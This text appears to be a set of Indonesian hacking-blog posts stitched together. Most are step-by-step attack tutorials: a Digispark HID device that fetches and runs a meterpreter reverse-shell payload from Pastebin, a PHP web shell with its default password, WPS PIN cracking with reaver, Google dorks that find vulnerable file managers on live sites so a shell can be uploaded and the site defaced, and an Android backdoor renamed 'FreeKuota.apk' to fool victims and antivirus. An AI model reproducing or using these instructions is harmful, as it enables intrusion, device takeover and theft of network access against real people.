Hallo friend..., Selamat malam, kali ini gw mau share tentang HID Attack. Semacam exploit bug usb gitu, kalo judul gw kan pake kata-kata "usb rubber ducky", tapi karena harga usb rubber ducky harganya mahal jadi kita akalin pake digispark mikrokontroler. Disini gw pake digispark attiny85 arduino, jadi jauh lebih murah ketimbang yang aslinya kwkwkwk
Lanjut, sebenernya banyak payload-payload yang dibuat hak5, kalian bisa liat disini. ah disini yang gw pake itu payload Reverse Shell, oke simak aja tutor berikut ini
Bahan
Mikrokontroler (Digispark)
Arduino Software
OS Kali Linux
Caranya.? Tenang ini gw kasih tau caranya, pertama Buat dulu script payloadnya dengan msfvenom, script ini yang nantinya akan di eksekusi oleh payload usb rubber ducky tersebut. #msfvenom -p windows/meterpreter/reverse_tcp -f vbs --smallest LHOST=localip LPORT=portbebas -o Desktop/output.txt
Kita buka file output.txt yang ada pada desktop, copykan scriptnya ke pastebindan create new paste. Sebenarnya yang kita butuhkan cuma linknya doang, karena nanti di script arduinonya kita set agar mendownload dan menjalankan backdoor yg kita buat dan upload tadi. Nah ini kayak contoh punya saya
Lanjut, kita buka arduino softwarenya dan copy paste code berikut
Nah itu code yang warna merah kalian ganti dengan link pastebin kalian. Inget, jangan colok dulu digisparknya dan pastikan driver digistump sudah diinstall. Nah kalau semua sudah siap tinggal kalian klik tanda ceklist kemudian klik upload.
Ok kalau sudah terupload, biasa deh kalian aktifkan metasploitnya dan lanjut eksekusi, gw rasa dah pada faham semuanya deh
Tuh gw kasih juga tutorial videonya, kalau masih kurang faham silahkan bertanya pada kolom komentar wkwkwk Btw ini hanya untuk edukasi saja yah, jangan yang macem-macem, resiko di tanggung sendriri ...
THX !!!
NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
Postingan kali ini hanya catatan gw, laptop gw dualboot windows7 dan kali linux. Karena windows7 saya ngecrash, jadi saya install ulang + upgrade ke windows10 dan ternyata grub kali linux saya hilang, ya iyalah hilang, karena pas gw install grubnya gw setting dari grub linux bukan grub windows kayak easyBCD atau apalah.
Setelah gw cari-cari dan ketemu cara fixnya, banyak kok blogger lain yang bahas ini. Lanjut, dan ternyata ketemu neeeh caranya.
Langsung caw - Siapkan bootable Kali Linux - Masuk ke Live System Kali Linux - Kemudian buka terminal dan ketik #fdisk -l - Cari partisi linux anda
Hallo friend, Gw lagi sedih nih, jadi gw mau bagi-bagi mini shell nih Ini gw recode sendiri, gw ngambil dari script shell T.I Sniper dan IndoXploit. Jadilah kayak gini Ini penampakannya
Ini login pagenya, default passwordnya "./Mruw4x21".
Nah ini tampilannya Untuk fiturnya? yah namanya juga mini shell yah fiturnya dikit, di shell ini gw nambahin Console doang, biar bisa socket server. Untu bugnya? yah banyak lah, namanya manusia, apalagi noob kek gw wkwkwk :'V udah aha
Hallo Friend... Kali ini gw mau share gimana cara hack MiFi, buat kalian para mahasiswa miskin kuota, neeh gw kasih tau gimana caranya nih. Disini bahan praktek gw MiFi M3Z Andromax, teknik ini memanfaatkan celah keamanan WPS Pin, sistem kerjanya sederhana dengan membruteforce 4 digit dari pin wpsnya kemudian merequest password dari pin yg didapat dan pasti akurat. Ini bukan termasuk kedalam bruteforce atau evil twin attack kaya fluxion/linset, yah memang brutefoce tapi pin yg di bruteforce jadi pasti akurat karena pin itu full angka jadi pasti dapet, asalkan WPS MiFinya aktif. Langsung lah Aktifkan monitor mode #airmon-ng check kill #airmon-ng start wlan1
Btw gw pake adapter eksternal, karena adapter internalku frekuensi dBmnya lemah. Okeh, lanjut jalankan wash untuk mengetahui apakah router victim memiliki celah wps atau tidak, kalo ada nanti akan tampil detail dari router tersebut, ketikan perintah berikut
#wash -i wlan1mon
Kemudian coba kita exploit, ketik perintah berikut #reaver -i wlan1mon -b (bssid) -c (channel) -vv -K 1
Kalo udah dapet WPS Pin, itu artinya kita sudah ketemu kuncinya tinngal, tinggal kita coba buka deh pintunya wkwkwkw :'V
Hallo friend, kali ini gw mau share sesuai judul di atas. Jujur gw baru belajar arduino, kenapa harus diinstall digistump? karena gw mau ngexplore digispark, apasih digispark tuh? itu mikrocontroler. Oke langsung aja lah
Next, kalian download dulu arduinonya Setelah itu ekstrak filearduinonya Kalau udah masuk ke folder arduino hasil ekstrak tadi
#cd arduino/
Setelah itu, setting permission install.sh jadi full control
#chmod +x install.sh Lalu jalankan proses install #./install.sh Tunggu proses pembuatan icon desktop sebentar , kalo udah beres double click icon arduino IDE di desktop dan taraaaaa jalan dah
Okeh selanjutnya install digistumpnya, buka arduino IDEnya Setelah jalan klik file > pereferences Kemudian copy paste url berikut:
http://digistump.com/package_digistump_index.json
Ke textarea Additional Boards Manager URLs
Next kita ke tools > Board > Boards managers Lanjut ganti type dari All jadi contributed, terus pilih Arduino AVR Boards dan klik install
Udah de beres, tinggal lanjut explore aja deh Ini video tutornya biar lebih jelas
*~.Happy New Year.~* Hallo guys, kali ini gw mw sharing cara deface neh, Sebenernya gw bukan defacer sih, ini juga live targetnya gw dapet dari temen.
Nick: swal0w Tuh kalo mau tau dia, gw dikasih live target + diajarin deface. Ok langsung aja, cukup curhatnya Next, kalian cari sendiri live targetnya
Dork inurl:/filemanager intext:index of inurl:assets/filemanager intext:index of inurl:/js/filemanager/ "index of" Exploit /filemanager/dialog.php Oke, silahkan kalian dorking, kalo udah ketemu satu web
contoh: www.target.co.li coba kalian exploit dengan menambahkan /filemanager/dialog.php ibelakang linknya
contoh: www.target.co.li/filemanager/dialog.php
Kalo vuln nanti bakal kek gini
Nah, kalo udah kayak gini kita tanam shell, biasanya kalo RFM tidak bisa mengupload file dengan format .php Maka caranya cukup dengan bypass extensi / tamper data. Disini gw pake teknik yg bypass ext, jadi shell.php.fla. Habis itu gw upload dah
Untuk Mengaksesnya cukup klik kanan dan klik show url, nanti akan muncul link dan paste di browser
Silahkan login
Wokeh, kalo udah keupload ya terserah mau diapain. Kalo saran gw sih jangan dirusak gan, kasian wkwkwk
NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaan di luar tanggung jawab kami Thanx
*-.Happy New Year .-* Hallo friend, Kali ini gw mau share gimana caranya ngubah nama backdoor android. Buat kalian yang hobi exploit jaringan pasti pengen sebisa mungkin agar backdoor kalian tidak terdeteksi oleh antivirus atau bahkan oleh user secara kasap mata, entah kalian gunakan undetect backdoor, hide backdoor atu apalah yang penting gk ketahuan. Nah disini gw punya satu trik sederhana mengubah nama backdoor android dengan apktool, agar backdoor kalian tidak mudah terdeteksi dengan mudah. Okeh next aja Bahan :
Apktool
Msfvenom / Generate Backdoor Lainya
Metasploit
Text Editor
Next : Pertama kita buat backdoornya dengan msfvenom atau tools pembuat backdoor lainnya bebas, kalo gw make msfvenom
nb: lhost : ip attacker lport : port attacker (bebas) Hack.apk: nama output (bebas)
Ok, nanti kalian dapat file output dengan format .apk, kalau udah kita decompile file .apk tersebut menggunakan apktool #apktool d Hack.apk
Nanti nongol folder baru dengan nama sesuai nama file .apknya
Next, masuk ke foldernya, cari file dengan nama AndroidManifest.xml dan buka filenya Kemudian cari kata-kata android:label atau bisa juga android:name untuk mengetahui nama file yang menyimpan file script desain nama dari apk backdoor kita, gunakan CTRL+F untuk mempermudah pencarian
Nah dah ketemu, disitu dapat dilihat android:label="@string/app_name", ini menandakan bahwa file script mempunyai nama string.xml dan label app_nam. Biasanya ada pada lokasi /res/value/string.xml
Kalo udah ketemu, buka filenya kemudian cari kata app_name
Kemudian silahkan ganti nama backdoornya (bebas) dan save Kalo udah di ganti kita compile lagi file backdoornya
#apktool b -o newname.apk folder_decompile #apktool b -o FreeKuota.apk Hack
Ok, kalau udah sampe sini kita signapk dulu backdoornya, agar dapat di install di perangkat target, silahkan kalian download sendiri SignApknya atau kalo mau ke gw pm/comment wkwkwkw ketikkan perintah berikut